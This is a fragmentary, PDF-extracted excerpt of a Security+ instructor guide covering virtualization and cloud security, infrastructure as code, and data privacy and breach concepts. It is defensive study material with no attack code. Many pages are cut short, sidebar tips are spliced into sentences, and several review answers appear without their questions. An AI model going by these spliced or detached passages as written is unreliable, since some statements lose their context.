LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
416 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Each VM needs to be installed with its own security software suite to protect against
malware and intrusion attempts. Each guest must also have a patch management
process. This might mean installing updates locally or replacing the guest instance from
an updated VM template image.
Ordinary antivirus software installed on the host will NOT detect viruses infecting the guest
OS. Scanning the virtual disks of guest OSes from the host will cause serious performance
problems.
Although one of the primary benefits of virtualization is the ease of deploying new
systems, this type of system sprawl and deployment of undocumented assets can also
be the root of security issues. It will often be the case that a system will be brought up
for "just a minute" to test something, but languish for months or years, undocumented,
unsecured, and unpatched. Each of these undocumented systems could represent an
exploitable vulnerability. They increase the potential attack surface of the network.
Policies and procedures for tracking, securing, and, when no longer used, destroying
virtualized assets should be put in place and carefully enforced.
Virtual machine life cycle management (VMLM) software can be deployed to enforce
VM sprawl avoidance. VMLM solutions provide you with a centralized dashboard for
maintaining and monitoring all the virtual environments in your organization. More
generally, the management procedures for developing and deploying machine images
need to be tightly drafted and monitored. VMs should conform to an application-
specific template with the minimum configuration needed to run that application
(that is, not running unnecessary services). Images should not be run in any sort of
environment where they could be infected by malware or have any sort of malicious
code inserted. One of the biggest concerns here is of rogue developers or contractors
installing backdoors or "logic bombs" within a machine image. The problem of criminal
or disgruntled staff is obviously one that affects any sort of security environment, but
concealing code within VM machine images is a bit easier to accomplish and has the
potential to be much more destructive.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 417
Review Activity:
Secure Cloud and Virtualization Services
A solution hosted by a third party cloud service provider (CSP) and shared between
subscribers (multi-tenant). This sort of cloud solution has the greatest security
concerns.
Software that manages virtual machines that has been installed to a guest OS. This is in
contrast to a Type I (or "bare metal") hypervisor, which interfaces directly with the host
hardware.
4. What is a VDE?
VM escaping refers to attacking other guest OSes or the hypervisor or host from within
a virtual machine. Attacks may be to steal information, perform Denial of Service (DoS),
infect the system with malware, and so on.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
418 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 15B
Apply Cloud Security Solutions
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 419
You must also consider the risk of insider threat, where the insiders are administrators
working for the service provider. Without effective security mechanisms such as
separation of duties and M of N control, it is highly likely that they would be able to
gain privileged access to your data. Consequently, the service provider must be able
to demonstrate to your satisfaction that they are prevented from doing so. There is
also the risk described earlier that your data is in proximity to other, unknown virtual
servers and that some sort of attack could be launched on your data from another
virtual server.
The Twitter hack affecting high-profile accounts being hijacked for a bitcoin scam is a good
illustration of the risks from insider threat (scmagazine.com/home/security-news/insider-
threats/twitter-hack-is-a-reminder-of-the-dangers-of-unfettered-employee-access).
As with any contracted service, with any *aaS solution, you place a large amount of
trust in the service provider. The more important the service is to your business, the
more risk you are investing in that trust relationship.
Clouds use the same types of security controls as on-premises networks, including Cloud Security
identity and access management (IAM), endpoint protection (for virtual instances), Controls
resource policies to govern access to data and services, firewalls to filter traffic
between hosts, and logging to provide an audit function. Teaching
Tip
Most CSP's will provide these security controls as native functionality of the cloud
Highlight the
platform. Google's firewall service is an example of this type of cloud native control
similarities to on-
(cloud.google.com/firewalls). The controls can be deployed and configured using premises security
either the CSP's web console, or programmatically via a command line interface (CLI) tasks.
or application programming interface (API). A third-party solution would typically be
installed as a virtual instance within the cloud. For example, you might prefer to run
a third-party next-generation firewall. This can be configured as an appliance and
deployed to the cloud. The virtual network architecture can be defined so that this
appliance instance is able to inspect traffic and apply policies to it, either by routing
the traffic through the instance or by using some type of bridging or mirroring. As an
example, consider the configuration guide for the Barracuda next-gen firewall (campus.
barracuda.com/product/cloudgenfirewall/doc/79462645/overview).
The same considerations can be made for other types of security controls—notably
data loss prevention and compliance management. Cloud native controls might
not exist for these use cases, they might not meet the functional requirements that
third party solutions can, and there may be too steep a transition in terms of change
management and skills development.
Secrets Management
A cloud service is highly vulnerable to remote access. A failure of credential
management is likely to be exploited by malicious actors. You must enforce strong
authentication policies to mitigate risks:
• Do not use the root user for the CSP account for any day-to-day logon activity.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
420 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Container Security
A container uses many shared components on the underlying platform, meaning it
must be carefully configured to reduce the risk of data exposure. In a container engine
such as Docker, each container is isolated from others through separate namespaces
and control groups (docs.docker.com/engine/security/security). Namespaces prevent
one container reading or writing processes in another, while control groups ensure
that one container cannot overwhelm others in a DoS-type attack.
• Latency—this is the time in milliseconds (ms) taken for the service to respond to an
API call. This can be measured for specific services or as an aggregate value across
all services. High latency usually means that compute resources are insufficient. The
cause of this could be genuine load or DDoS, however.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 421
Instance Awareness
As with on-premises virtualization, it is important to manage instances (virtual
machines and containers) to avoid sprawl, where undocumented instances are
launched and left unmanaged. As well as restricting rights to launch instances, you
should configure logging and monitoring to track usage.
Where the compute component refers to CPU and system memory resources, the Cloud Storage Security
storage component means the provisioning of peristent storage capacity. As with the
compute component, the cloud virtualization layer abstracts the underlying hardware Teaching
to provide the required storage type, such as a virtual hard disk for a VM instance, Tip
object-based storage to serve static files in a web application, or block storage for use Make sure students
by a database server. Storage profiles will have different performance characteristics can recognize a JSON
for different applications, such as fast SSD-backed storage for databases versus slower format resource
HDD-backed media for archiving. The principal performance metric is the number of policy.
input/output operations per second (IOPS) supported.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
422 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
To read or write the data, the AES key must be available to the VM or container using
the storage object. With CSP-managed keys, the cloud provider handles this process
by using the access control rights configured on the storage resource to determine
whether access is approved and, if so, making the key available to the VM or container.
The key will be stored in a hardware security module (HSM) within the cloud. The HSM
and separation of duties policies protect the keys from insider threat. Alternatively,
customers can manage keys themselves, taking on all responsibility for secure
distribution and storage.
Encryption can also be applied at other levels. For example, applications can selectively
encrypt file system objects or use database-level encryption to encrypt fields and/or
records. All networking—whether customer to cloud or between VMs/containers within
the cloud—should use encrypted protocols such as HTTPS or IPSec.
Replication
Data replication allows businesses to copy data to where it can be utilized most
effectively. The cloud may be used as a central storage area, making data available
among all business units. Data replication requires low latency network connections,
security, and data integrity. CSPs offer several data storage performance tiers
(cloud.google.com/storage/docs/storage-classes). The terms hot and cold storage
refer to how quickly data is retrieved. Hot storage retrieves data more quickly than
cold, but the quicker the data retrieval, the higher the cost. Different applications have
diverse replication requirements. A database generally needs low-latency, synchronous
replication, as a transaction often cannot be considered complete until it has been
made on all replicas. A mechanism to replicate data files to backup storage might not
have such high requirements, depending on the criticality of the data.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 423
Within the cloud, the CSP establishes a virtualization layer that abstracts the underlying Cloud Networking
physical network. This allows the CSP to operate a public cloud where the networking Security
performed by each customer account is isolated from the others. In terms of customer-
configured cloud networking, there are various contexts: Teaching
Tip
• Networks by which the cloud consumer operates and manages the cloud systems.
Note that VPC is
• Virtual networks established between VMs and containers within the cloud. synonymous with
virtual network.
• Virtual networks by which cloud services are published to guests or customers on
the Internet.
The following notes focus on features of networking in AWS. Other vendors support similar
functionality, though sometimes with different terminology. For example, in Microsoft Azure,
VPCs are referred to as virtual networks.
The instance network adapter is not configured with this public IP address. The instance's
NIC is configured with an IP address for the subnet. The public address is used by the
virtualization management layer only. Public IP addresses can be assigned from your own
pool or from a CSP-managed service, such as Amazon's Elastic IP (docs.aws.amazon.com/
AWSEC2/latest/UserGuide/elastic-ip-addresses-eip.html).
There are other ways to provision external connectivity for a subnet if it is not
appropriate to make it public:
• NAT gateway—this feature allows an instance to connect out to the Internet or to
other AWS services, but does not allow connections initiated from the Internet.
• VPN—there are various options for establishing connections to and between VPCs
using virtual private networks (VPNs) at the software layer or using CSP-managed
features.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
424 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Amazon's white paper sets out options for configuring multi-VPC infrastructure in more
detail (d1.awsstatic.com/whitepapers/building-a-scalable-and-secure-multi-vpc-aws-
network-infrastructure.pdf).
Gateway Endpoints
A gateway endpoint is used to connect instances in a VPC to the AWS S3 (storage) and
DynamoDB (database) services. A gateway endpoint is configured as a route to the
service in the VPC's route table.
Interface Endpoints
An interface endpoint makes use of AWS's PrivateLink feature to allow private access to
custom services:
• A custom service provider VPC is configured by publishing the service with a DNS
host name. Alternatively, the service provider might be an Amazon default service
that is enabled as a VPC interface endpoint, such as CloudWatch Events/Logs.
• A VPC endpoint interface is configured in each service consumer VPC subnet. The
VPC endpoint interface is configured with a private IP address within the subnet
plus the DNS host name of the service provider.
• Each instance within the VPC subnet is configured to use the endpoint address to
contact the service provider.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 425
As in an on-premises network, a firewall determines whether to accept or deny/discard Cloud Firewall Security
incoming and outgoing traffic. Firewalls work with multiple accounts, VPCs, subnets
within VPCs, and instances within subnets to enforce the segmentation required by
the architectural design. Segmentation may be needed for many different reasons,
including separating workloads for performance and load balancing, keeping data
processing within an isolated segment for compliance with laws and regulations,
and compartmentalizing data access and processing for different departments or
functional requirements.
Filtering decisions can be made based on packet headers and payload contents at
various layers, identified in terms of the OSI model:
• Network layer (layer 3)—the firewall accepts or denies connections on the basis of
IP addresses or address ranges and TCP/UDP port numbers (the latter are actually
contained in layer 4 headers, but this functionality is still always described as basic
layer 3 packet filtering).
• Transport layer (layer 4)—the firewall can store connection states and use rules to
allow established or related traffic. Because the firewall must maintain a state table
of existing connections, this requires more processing power (CPU and memory).
• Application layer (layer 7)—the firewall can parse application protocol headers
and payloads (such as HTTP packets) and make filtering decisions based on their
contents. This requires even greater processing capacity (or load balancing), or the
firewall will become a bottleneck and increase network latency.
While you can use cloud-based firewalls to implement on-premises network security,
here we are primarily concerned with the use of firewalls to filter traffic within and to
and from the cloud itself. Such firewalls can be implemented in several ways to suit
different purposes:
• As software running on an instance. This sort of host-based firewall is identical
to ones that you would configure for an on-premises host. It could be a stateful
packet filtering firewall or a web application firewall (WAF) with a ruleset tuned to
preventing malicious attacks. The drawback is that the software consumes instance
resources and so is not very efficient. Also, managing the rulesets across many
instances can be challenging.
• As a service at the virtualization layer to filter traffic between VPC subnets and
instances. This equates to the concept of an on-premises network firewall.
In AWS, basic packet filtering rules managing traffic that each instance will accept can Security Groups
be managed through security groups (docs.aws.amazon.com/vpc/latest/userguide/
VPC_SecurityGroups.html). A security group provides stateful inbound and outbound Teaching
filtering at layer 4. The stateful filtering property means that it will allow established Tip
and related traffic if a new connection has been accepted. A security group is a
The default security group allows any outbound traffic and any inbound traffic from collection of firewall
rules that can be
instances also bound to the default security group. A custom security group sets the
applied to one or
ports and endpoints that are allowed for inbound and outbound traffic. There are more instances,
no deny rules for security groups; any traffic that does not match an allow rule is working like a virtual
dropped. Consequently, a custom group with no rules will drop all network traffic. host firewall.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
426 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Multiple instances can be assigned to the same security group, and instances within
the same subnet can be assigned to different security groups. You can assign multiple
security groups to the same instance. You can also assign security groups to VPC
endpoint interfaces.
Adding a custom security group when launching a new instance in AWS EC2. This policy allows SSH
access from a single IP address (redacted) and access to HTTPS from any IP address.
Most cloud providers support similar filtering functionality, though they may be
implemented differently. For example, in Azure, network security groups can be
applied to network interfaces or to subnets (docs.microsoft.com/en-us/azure/virtual-
network/security-overview).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 427
• Reverse proxy—this is positioned at the cloud network edge and directs traffic to
cloud services if the contents of that traffic comply with policy. This does not require
configuration of the users' devices. This approach is only possible if the cloud
application has proxy support.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
428 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Cloud Security Solutions
Answer the following questions:
1. Describe some key considerations that should be made when hosting data
or systems via a cloud solutions provider.
Integrate auditing and monitoring procedures and systems with on-premises detection,
identify responsibility for implementing security controls (such as patching or backup),
identify performance metrics in an SLA, and assess risks to privacy and confidentiality
from breaches at the service provider.
2. True or false? The account with which you register for the CSP services is
not an account with root privileges.
False. This account is the root account and has full privileges. It should not be used for
day-to-day administration or configuration.
False. There are limits to the number of virtual private clouds (VPCs) that can be
created, but more than one is allowed.
This is accomplished by assigning the instance to a security group with the relevant
policy configured.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 429
Topic 15C
Summarize Infrastructure
as Code Concepts
In the early days of computer networks, architecture was focused on the provision
Services Integration
of server machines and intermediate network systems (switches and routers). and Microservices
Architectural choices centered around where to place a "box" to run monolithic
network applications such as routing, security, address allocation, name resolution, Teaching
file sharing, email, and so on. With virtualization, the provision of these applications Tip
is much less dependent on where you put the box and the OS that the box runs. Contrast the legacy
Virtualization helps to make the design architecture fit to the business requirement IT focus on deploying
rather than accommodate the business workflow to the platform requirement. boxes with the
modern paradigm of
Service-Oriented Architecture (SOA) abstracted, virtualized
compute, storage,
Service-oriented architecture (SOA) conceives of atomic services closely mapped and network capacity
that can be spun up,
to business workflows. Each service takes defined inputs and produces defined
perform a workload,
outputs. The service may itself be composed of sub-services. The key features of and then released for
a service function are that it is self-contained, does not rely on the state of other the next task.
services, and exposes clear input/output (I/O) interfaces. Because each service has a
simple interface, interoperability is made much easier than with a complex monolithic
application. The implementation of a service does not constrain compatibility choices
for client services, which can use a different platform or development language. This
independence of the service and the client requesting the service is referred to as
loose coupling.
Microservices
Microservice-based development shares many similarities with Agile software project
management and the processes of continuous delivery and deployment. It also shares
roots with the Unix philosophy that each program or tool should do one thing well.
The main difference between SOA and microservices is that SOA allows a service to be
built from other services. By contrast, each microservice should be capable of being
developed, tested, and deployed independently. The microservices are said to be highly
decoupled rather than just loosely decoupled.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
430 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 431
interacting with other functions to facilitate client requests. When the client requires
some operation to be processed, the cloud spins up a container to run the code,
performs the processing, and then destroys the container. Billing is based on execution
time, rather than hourly charges. This type of service provision is also called function
as a service (FaaS). FaaS products include AWS Lambda (aws.amazon.com/lambda),
Google Cloud Functions (cloud.google.com/functions), and Microsoft Azure Functions
(azure.microsoft.com/services/functions).
The serverless paradigm eliminates the need to manage physical or virtual server
instances, so there is no management effort for software and patches, administration
privileges, or file system security monitoring. There is no requirement to provision
multiple servers for redundancy or load balancing. As all of the processing is taking
place within the cloud, there is little emphasis on the provision of a corporate network.
This underlying architecture is managed by the service provider. The principal
network security job is to ensure that the clients accessing the services have not been
compromised in a way that allows a malicious actor to impersonate a legitimate user.
This is a particularly important consideration for the developer accounts and devices
used to update the application code underpinning the services. These workstations
must be fully locked down, running no other applications or web code than those
necessary for development.
Serverless does have considerable risks. As a new paradigm, use cases and best
practices are not mature, especially as regards security. There is also a critical and
unavoidable dependency on the service provider, with limited options for disaster
recovery should that service provision fail.
Serverless architecture depends heavily on the concept of event-driven orchestration
to facilitate operations. For example, when a client connects to an application, multiple
services will be called to authenticate the user and device, identify the device location
and address properties, create a session, load authorizations for the action, use
application logic to process the action, read or commit information from a database,
and write a log of the transaction. This design logic is different from applications
written to run in a "monolithic" server-based environment. This means that adapting
existing corporate software will require substantial development effort.
The use of cloud technologies encourages the use of scripted approaches to Infrastructure as Code
provisioning, rather than manually making configuration changes, or installing patches.
An approach to infrastructure management where automation and orchestration fully
replace manual configuration is referred to as infrastructure as code (IaC).
One of the goals of IaC is to eliminate snowflake systems. A snowflake is a
configuration or build that is different from any other. The lack of consistency—or
drift—in the platform environment leads to security issues, such as patches that
have not been installed, and stability issues, such as scripts that fail to run because of Show Slide(s)
some small configuration difference. By rejecting manual configuration of any kind,
IaC ensures idempotence. Idempotence means that making the same call with the Software-Defined
same parameters will always produce the same result. Note that IaC is not simply a Networking
matter of using scripts to create instances. Running scripts that have been written ad
hoc is just as likely to cause environment drift as manual configuration. IaC means Teaching
using carefully developed and tested scripts and orchestration runbooks to generate Tip
consistent builds. You can refer students
to Cisco's website for
more information
Software-Defined Networking about SDN (cisco.
com/c/en/us/
IaC is partly facilitated by physical and virtual network appliances that are fully solutions/software-
configurable via scripting and APIs. As networks become more complex—perhaps defined-networking/
involving thousands of physical and virtual computers and appliances—it becomes overview.html).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
432 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
more difficult to implement network policies, such as ensuring security and managing
traffic flow. With so many devices to configure, it is better to take a step back and
consider an abstracted model about how the network functions. In this model, network
functions can be divided into three "planes":
• Control plane—makes decisions about how traffic should be prioritized and
secured, and where it should be switched.
• Data plane—handles the actual switching and routing of traffic and imposition of
security access controls.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 433
• Edge gateways perform some pre-processing of data to and from edge devices
to enable prioritization. They also perform the wired or wireless connectivity to
transfer data to and from the storage and processing networks.
• Fog nodes can be incorporated as a data processing layer positioned close to the
edge gateways, assisting the prioritization of critical data transmission.
• The cloud or data center layer provides the main storage and processing resources,
plus distribution and aggregation of data between sites.
In security terms, the fog node or edge gateway layers represent high-value targets for
both denial of service and data exfiltration attacks.
The controversy over the use of Huawei's equipment within 5G and edge networks illustrates
the risks and concerns over supply chains and trusted computing (threatpost.com/huawei-
5g-security-implications/152926).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
434 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Infrastructure as Code
Answer the following questions:
2. You have been asked to produce a summary of pros and cons for the
products Chef and Puppet. What type of virtualization or cloud computing
technology do these support?
5. What is SDV?
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 435
Lesson 15
Summary
You should be able to summarize virtualization and cloud computing concepts and Teaching
implement cloud security controls for compute, storage, and network functions. Tip
Check that students
Guidelines for Implementing Secure Cloud Solutions are confident about
the content that has
been covered. If there
Follow these guidelines for deploying or extending use of cloud and virtualization
is time, revisit any
infrastructure: content examples that
• Assess requirements for availability and confidentiality that will determine the they have questions
about. If you have
appropriate cloud deployment model (public, hosted private, private, community, used all the available
or hybrid). time for this lesson
block, note the issues,
• Identify a service provisioning model (software, platform, or infrastructure) that best
and schedule time for
fits the application requirement, given available development resources and the a review later in the
degree of customization required. course.
• Consider whether the service or business need could be better supported by
advanced concepts:
• If using a CSP, create an SLA and security responsibility matrix to identify who
will perform security-critical tasks. Ensure that reporting and monitoring of cloud
security data is integrated with on-premises monitoring and incident response.
• If using on-premises virtualization or a private data center, ensure robust
procedures for developing and deploying virtual machines and protecting
hypervisor security.
• Configure native or third-party security controls to protect cloud services:
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 16
Explaining Data Privacy and
Protection Concepts
Lesson Objectives
In this lesson, you will:
• Explain privacy and data sensitivity concepts.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
438 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 16A
Explain Privacy and Data
Sensitivity Concepts
Lesson 16: Explaining Data Privacy and Protection Concepts | Topic 16A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 439
• Retention—data might have to be kept in an archive past the date when it is still
used for regulatory reasons.
A data governance policy describes the security controls that will be applied to protect Data Roles and
data at each stage of its life cycle. There are important institutional governance roles Responsibilities
for oversight and management of information assets within the life cycle:
• Data owner—a senior (executive) role with ultimate responsibility for maintaining
the confidentiality, integrity, and availability of the information asset. The owner is
responsible for labeling the asset (such as determining who should have access and
determining the asset's criticality and sensitivity) and ensuring that it is protected
with appropriate controls (access control, backup, retention, and so forth). The
owner also typically selects a steward and custodian and directs their actions and
sets the budget and resource allocation for sufficient controls.
• Data steward—this role is primarily responsible for data quality. This involves tasks
such as ensuring data is labeled and identified with appropriate metadata and that
data is collected and stored in a format and with values that comply with applicable
laws and regulations.
• Data custodian—this role handles managing the system on which the data assets
are stored. This includes responsibility for enforcing access control, encryption, and
backup/recovery measures.
• Data Privacy Officer (DPO)—this role is responsible for oversight of any personally
identifiable information (PII) assets managed by the company. The privacy officer
ensures that the processing, disclosure, and retention of PII complies with legal and
regulatory frameworks.
In the context of legislation and regulations protecting personal privacy, the following
two institutional roles are important:
• Data controller—the entity responsible for determining why and how data is
stored, collected, and used and for ensuring that these purposes and means are
lawful. The data controller has ultimate responsibility for privacy breaches, and is
not permitted to transfer that responsibility.
• Data processor—an entity engaged by the data controller to assist with technical
collection, storage, or analysis tasks. A data processor follows the instructions of a
data controller with regard to collection or processing.
Lesson 16: Explaining Data Privacy and Protection Concepts | Topic 16A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
440 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Data controller and processor tend to be organizational roles rather than individual
ones. For example, if Widget.foo collects personal data to operate a webstore on its
own cloud, it is a data collector and data processor. If Widget.foo passes aggregate
data to Grommet.foo asking them to run profitability analytics for different customer
segments on its AI-backed cloud, Grommet.foo is a data processor acting under the
instruction of Widget.foo. Within the Grommet.foo and Widget.foo companies, the data
owner might take personal responsibility for the lawful performance of data controller
and processor functions.
• Critical (top secret)—the information is too valuable to allow any risk of its capture.
Viewing is severely restricted.
Using Microsoft Azure Information Protection to define an automatic document labeling and
watermarking policy. (Screenshot used with permission from Microsoft.)
Lesson 16: Explaining Data Privacy and Protection Concepts | Topic 16A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 441
A type schema applies a more detailed label to data than simple classification. Data Types
Customer Data
Customer data can be institutional information, but also personal information about
the customer's employees, such as sales and technical support contacts. This personal
customer data should be treated as PII. Institutional information might be shared
under a nondisclosure agreement (NDA), placing contractual obligations on storing and
processing it securely.
Health Information
Personal health information (PHI)—or protected health information—refers to
medical and insurance records, plus associated hospital and laboratory test results.
PHI may be associated with a specific person or used as an anonymized or deidentified
data set for analysis and research. An anonymized data set is one where the identifying
data is removed completely. A deidentified set contains codes that allow the subject
information to be reconstructed by the data provider.
PHI trades at high values on the black market, making it an attractive target. Criminals
seek to exploit the data for insurance fraud or possibly to blackmail victims. PHI data is
extremely sensitive and its loss has a permanent effect. Unlike a credit card number or
Lesson 16: Explaining Data Privacy and Protection Concepts | Topic 16A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
442 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Financial Information
Financial information refers to data held about bank and investment accounts, plus
information such as payroll and tax returns. Payment card information comprises
the card number, expiry date, and the three-digit card verification value (CVV). Cards
are also associated with a PIN, but this should never be transmitted to or handled by
the merchant. Abuse of the card may also require the holder's name and the address
the card is registered to. The Payment Card Industry Data Security Standard (PCI DSS)
defines the safe handling and storage of this information (pcisecuritystandards.org/
pci_security).
Government Data
Internally, government agencies have complex data collection and processing
requirements. In the US, federal laws place certain requirements on institutions that
collect and process data about citizens and taxpayers. This data may be shared with
companies for analysis under strict agreements to preserve security and privacy.
Privacy Notices
Informed consent means that the data must be collected and processed only for
the stated purpose, and that purpose must be clearly described to the user in plain
language, not legalese. This consent statement is referred to as a privacy notice. Data
collected under that consent statement cannot then be used for any other purpose.
For example, if you collect an email address for use as an account ID, you may not send
marketing messages to that email address without obtaining separate consent for that
discrete purpose. Purpose limitation will also restrict your ability to transfer data to
third parties.
Impact Assessments
Tracking consent statements and keeping data usage in compliance with the consent
granted is a significant management task. In organizations that process large amounts
of personal data, technical tools that perform tagging and cross-referencing of
personal data records will be required. A data protection impact assessment is a
process designed to identify the risks of collecting and processing personal data in the
context of a business workflow or project and to identify mechanisms that mitigate
those risks.
Data Retention
Data retention refers to backing up and archiving information assets in order to comply
with business policies and/or applicable laws and regulations. To meet compliance
and e-discovery requirements, organizations may be legally bound to retain certain
types of data for a specified period. This type of requirement will particularly affect
financial data and security log data. Conversely, storage limitation principles in privacy
Lesson 16: Explaining Data Privacy and Protection Concepts | Topic 16A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 443
legislation may prevent you from retaining personal data for longer than is necessary.
This can complicate the inclusion of PII in backups and archives.
Some states and nations may respect data privacy more or less than others; and Data Sovereignty
likewise, some nations may disapprove of the nature and content of certain data. They and Geographical
may even be suspicious of security measures such as encryption. When your data is Considerations
stored or transmitted in other jurisdictions, or when you collect data from citizens in
other states or other countries, you may not "own" the data in the same way as you'd
expect or like to.
Data Sovereignty
Data sovereignty refers to a jurisdiction preventing or restricting processing and
storage from taking place on systems do not physically reside within that jurisdiction.
Data sovereignty may demand certain concessions on your part, such as using location-
specific storage facilities in a cloud service.
For example, GDPR protections are extended to any EU citizen while they are within
EU or EEA (European Economic Area) borders. Data subjects can consent to allow a
transfer but there must be a meaningful option for them to refuse consent. If the
transfer destination jurisdiction does not provide adequate privacy regulations (to
a level comparable to GDPR), then contractual safeguards must be given to extend
GDPR rights to the data subject. In the US, companies can self-certify that the
protections they offer are adequate under the Privacy Shield scheme (privacyshield.
gov/US-Businesses).
Geographical Considerations
Geographic access requirements fall into two different scenarios:
• Storage locations might have to be carefully selected to mitigate data sovereignty
issues. Most cloud providers allow choice of data centers for processing and
storage, ensuring that information is not illegally transferred from a particular
privacy jurisdiction without consent.
• Employees needing access from multiple geographic locations. Cloud-based file and
database services can apply constraint-based access controls to validate the user's
geographic location before authorizing access.
A data breach occurs when information is read or modified without authorization. Privacy Breaches and
"Read" in this sense can mean either seen by a person or transferred to a network or Data Breaches
storage media. A data breach is the loss of any type of data, while a privacy breach
refers specifically to loss or disclosure of personal and sensitive data. Teaching
Tip
Organizational Consequences Note that the
definition of a breach
A data or privacy breach can have severe organizational consequences: can be quite narrow.
It is important to
• Reputation damage—data breaches cause widespread negative publicity, and review legislation
customers are less likely to trust a company that cannot secure its information and determine
assets. precise compliance
requirements.
• Identity theft—if the breached data is exploited to perform identity theft, the data
subject may be able to sue for damages.
Lesson 16: Explaining Data Privacy and Protection Concepts | Topic 16A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
444 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Fines—legislation might empower a regulator to levy fines. These can be fixed sum
or in the most serious cases a percentage of turnover.
• IP theft—loss of company data can lead to loss of revenue. This typically occurs
when copyright material—unreleased movies and music tracks—is breached. The
loss of patents, designs, trade secrets, and so on to competitors or state actors can
also cause commercial losses, especially in overseas markets where IP theft may be
difficult to remedy through legal action.
Notifications of Breaches
The requirements for different types of breach are set out in law and/or in regulations.
The requirements indicate who must be notified. A data breach can mean the loss or
theft of information, the accidental disclosure of information, or the loss or damage of
information. Note that there are substantial risks from accidental breaches if effective
procedures are not in place. If a database administrator can run a query that shows
unredacted credit card numbers, that is a data breach, regardless of whether the query
ever leaves the database server.
Escalation
A breach may be detected by technical staff and if the event is considered minor, there
may be a temptation to remediate the system and take no further notification action.
This could place the company in legal jeopardy. Any breach of personal data and most
breaches of IP should be escalated to senior decision-makers and any impacts from
legislation and regulation properly considered.
Lesson 16: Explaining Data Privacy and Protection Concepts | Topic 16A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 445
Lesson 16: Explaining Data Privacy and Protection Concepts | Topic 16A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
446 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Privacy and Data Sensitivity Concepts
Answer the following questions:
1. What is the difference between the role of data steward and the role of data
custodian?
The data steward role is concerned with the quality of data (format, labeling,
normalization, and so on). The data custodian role focuses on the system hosting the
data assets and its access control mechanisms.
One set of tags could indicate the degree of confidentiality (public, confidential/secret,
or critical/top secret). Another tagging schema could distinguish proprietary from
private/sensitive personal data.
Personally identifiable information is any data that could be used to identify, contact,
or locate an individual.
The site should add a privacy notice explaining the purposes the personal information
is collected and used for. The form should provide a means for the user to give explicit
and informed consent to this privacy notice.
Data and privacy breaches can lead legislators or regulators to impose fines. In some
cases, these fines can be substantial (calculated as a percentage of turnover).
Lesson 16: Explaining Data Privacy and Protection Concepts | Topic 16A
